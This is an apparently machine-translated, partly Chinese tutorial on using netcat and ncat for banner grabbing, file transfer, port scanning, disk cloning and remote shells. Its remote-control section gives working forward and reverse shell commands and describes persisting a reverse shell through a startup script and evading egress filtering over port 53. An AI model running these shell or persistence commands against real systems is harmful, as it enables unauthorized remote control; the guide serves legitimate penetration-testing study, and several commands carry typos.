Common tools
Frequently used and powerful, an indispensable helper for security practitioners.
Nc/ncat
It is a Swiss army knife in network tools. Features: small size and powerful functions.
Cross-platform, there are windows and Linux.
Things you can do:
- telnet / Get banner information: NC is stronger than telnet
- Transmit text information: Example: it can be used as a chat tool
- Transfer files / directories
- Encrypted transmission file: The default transmission text file is not encrypted
- Remote control / Trojan
- Encrypt all traffic
- flow media services
- Remote clone hard drive
1.NC——telnet/banner
1. You can telnet the target port and send some commands to connect to the other party's service.
nc can be used as a client or a server. As a client, he can connect to the service ports of other servers to detect commands sent by the service ports.
常用语法: nc -nv ip 端口
-eg:nc -nv 1.1.1.1 80
nc -h #可以查看参数的使用
-v: display detailed connection output
-n: followed by ip address, if followed by domain name, -n parameter will not perform domain name resolution. So it is not recommended to talk to the domain name.
Example 1: 163 server
As a client, connect to pop3.163.com mailbox
1. Domain name resolution, get ip address
2. Run command
pop3 is port 110, so the command is:
nc -vn 123.126.97.79 110
Analysis information:
running instructions can reflect the first role of nc: after connecting to the server port, you will see some banner information related to the server. Through the connection, you can find that the 110 port on the server address is open, and returned "Welcome to…". Through this line of information analysis, we can know that the 163 mail server uses coremail, the mail service implemented by coremail.
Analysis information: It
will return a banner information of the 163smtp server, a special anti-spam gateway of the coremail system.
Example 2: http server
2.NC——Transmit text information
For example: two servers are chatting.
If you need two servers to interact, you need one of the servers to open the port for listening. Another server acts as a client to connect to that port.
A: nc -l -p port number
B: nc -nv ip port The
connection is terminated at one end, and both ends are terminated at the same time.
Suitable for remote electronic forensics.
There is a principle of electronic forensics: if a computer is suspected to be a problem, it should be audited to minimize or not modify the contents of the files in the computer to avoid destroying the evidence that can be collected.
-q: Exit the command to disconnect after a certain time delay after the command is executed. If the connection is not automatically disconnected, it is not known whether the command is completed.
3.NC——remote control
It can only replace ssh to a certain extent to achieve remote control, but it cannot be completely replaced.
It can realize two-way control.
Similar can be understood as QQ desktop remote control.
** Note: ** Control windows through kail, you can install nc on windows, windows users change bash to cmd in the command.
Forward
The client obtains the shell permission of the server.
#服务端:
A:nc -lp 端口 -c bash #一旦别人用nc连接我,我会将bash shell通过nc的建立传给对方。
#客户端
B:nc -nv 服务端ip 端口
The files listed on the left B ls are the contents of the A virtual machine on the right, which is equivalent to the remote control of the A virtual machine. Virtual machine B has obtained shell permissions for virtual machine A.
Reverse
The server obtains the shell permission of the client.
#服务器
A:nc -lp 端口
#客户端
B:nc -vn 服务器ip 端口 -c bash
B enters ls, pwd and other commands in the nc connection state, and nothing happens. A enters the information of B obtained by these instructions. At this time, A has obtained B's shell permissions.
Under normal circumstances: Suppose that B is a server that is placed in the IDC computer room to run services. A firewall is usually placed at the boundary of the IDC computer room. The firewall will not open very strange ports and map it to the virtual machine of A and allow outsiders to He connects, and the server in the IDC computer room will filter out the remaining access traffic from the outside to the inside except the open ports, and the traffic will be blocked at the border firewall.
For junior network administrators: it
is not practical to use a forward connection at this time. At this time, a reverse connection can be used. The attacker A used by the penetration tester opens the port to actively listen and passes the service startup script on B. Every time the system B is restarted, it will actively connect to the ip address of the attacker A. After the connection, B will actively hand over its shell to the attacker A. This situation will be easier to achieve. Because the network administrator does not restrict the flow control from the inside out.
For network administrators with better security awareness:
there may also be situations where he will ban most of the traffic from the inside out. However, B must have certain ports open, for example, if port 53 is opened, then A can open port 53 to listen on port 53, so that the border firewall will not filter this access behavior.
For a network administrator
who is very good at security, he may be a server in the intranet server group as his own DNF server. The other business servers are really from the internal network to the external network and are really inside the firewall. It ’s really hard to get over.
4.NC——NCAT
All functions of nc can be realized by ncat.
NC disadvantages:
- All data traffic transmitted by the NC is unencrypted and lacks encryption capabilities. Easy to sniff.
- Open the port and it will be used by others. Lack of identity verification capabilities, can not judge the identity of users.
NCAT is to make up for these shortcomings, he is included in the nmap toolkit, is one of the nmap tool suite.
An example
Use ncat to achieve pipeline encryption. Regardless of whether the data inside is plain text or whatever, the data seen when someone grabs the packet is encrypted because the pipe itself is encrypted.
#服务端
ncat -c bash --allow 客户端ip -vnl 端口 --ssl
#服务端
ncat -v 服务端ip 端口 --ssl
The fingerprint information of ssl is different every time the connection is established.
The right virtual machine only allows the virtual machine with ip 118 to connect, but at this time the left virtual machine ip is 119, it will report input and output errors, the right virtual machine has been authenticated, and it will prompt that the connection is not allowed.
It should be noted that the nc parameter function of different platforms is different in different versions.
4.NC——Transfer files / directories
Transfer files:
#接收端打开端口
A:nc -lp 侦听端口 >文件名 #>,输出;侦听该端口侦听到的内容输出到文件名中
#发送端
B:nc -nv ip 端口< 文件名 -q 1 #<,将要传递的文件、文件名输入到nc的连接远端的端口里
或
#传输端打开端口
A:nc -lp 端口 < 文件名 -q 1
#接收端
B: nc -nv ip 端口> 文件名
One is to open the port and wait for others to transfer files, and the other is to open the port and wait for others to accept files.
Transfer catalog
A:tar -cvf - 要打包的文件/ | nv -lp 端口 -q 1 #将打包的文件的输入作为后面文件的输出
B: nc -nv ip 端口 | tar -xvf - #对收到的文件解包
Encrypted file transfer
#接收端开放端口
A:nc -lp 端口|mcrypt --flush -Fbqd -a rijndael-256-m ecb >文件名 #侦听端口,将收到的文件解密输出
B: mcrypt --flush -Fbq -a rijndael-256-m ecb < 文件名 |nc -nv 接收端ip 端口 -q 1 #将文件加密输出
He is not the encryption function of nc itself, but the encryption using the operating system mcrypt command.
The default mail command is not installed in kail, you need to install it yourself.
apt-get install mcrypt #安装mcrypt命令
5.NC——Streaming media service
A:cat 文件名 | nc -lp 侦听端口 #以流的形式输出到B端
B:nc -nv ip 端口 | mplayer -vo xll -cache 3000 - #将流的内容给媒体播放器,接收一点播放一点,默认缓存大小是3000
The mplayer command is not installed by default and needs to be installed.
The content of the saved file will not be generated locally.
6.NC——Port Scan
nc -nvz ip 1-65535(可以改变端口区间)
nc -nvzu ip 1-65535(可以改变端口区间)
By default, nc uses the tcp protocol, so if the tcp port is detected. If you want to detect the udp port, you can use the second command.
The information scanned by each scanner is not necessarily accurate. It is recommended to use several methods to scan, so that the data obtained is relatively accurate.
7.NC-Remote clone hard drive
For remote electronic forensics, the hard disk of the target server can be copied remotely or the memory can be copied.
#接收端开放端口
A:nc -lp 开放端口 | dd -of=/dev/sda
B:dd if=/dev/sda |nc -nv ip 端口 -q 1
